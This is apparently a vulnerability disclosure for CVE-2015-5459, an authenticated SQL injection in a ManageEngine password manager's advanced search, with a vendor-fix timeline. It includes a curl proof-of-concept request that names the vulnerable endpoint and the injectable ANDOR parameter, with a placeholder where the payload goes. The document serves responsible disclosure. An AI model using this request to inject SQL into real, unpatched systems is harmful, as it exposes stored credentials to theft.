CVE: CVE-2015-5459

CVSS v3: 9.9
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Description: An authenticated user (even the guest user) is able to execute arbitrary SQL code using a forged request to the SQLAdvancedALSearchResult.cc. The SQL query is build manually and is not escaped properly in the AdvanceSearch.class of AdventNetPassTrix.jar.

The problem is with escaping the operator when more then one condition is specified in the advanced search.

PoC:

$ curl https://localhost:7272/STATE_ID/1425543888647/SQLAdvancedALSearchResult.cc?ANDOR=***HERE_INJECT***&condition_1=Ptrx_Resource@RESOURCENAME&operator_1=CONTAINS&value_1=asd&condition_2=Ptrx_Resource@RESOURCENAME&operator_2=CONTAINS&value_2=asd2&FLAG=TRUE&COUNT=2&USERID=***USERID***&ADVSEARCH=true&SUBREQUEST=XMLHTTP

Video:

Timeline:

  • 30.06.2015 - vendor notified
  • 15.07.2015 - vendor fixed the vulnerability in version 8.1 (build 8101)

References: I wrote an article about “zero-knowledge” secret management systems to compare different existing password managers and give guidance on how to choose a really secure password management software:

Adamczyk Błażej. Secure and convenient secret management in distributed computer systems, 2016. WSEAS TRANSACTIONS ON COMPUTERS, vol. 15, no. 2016, pp. 327-333, Full text





tags: ManageEngine Password Manager Plus CVE CVE-2015-5459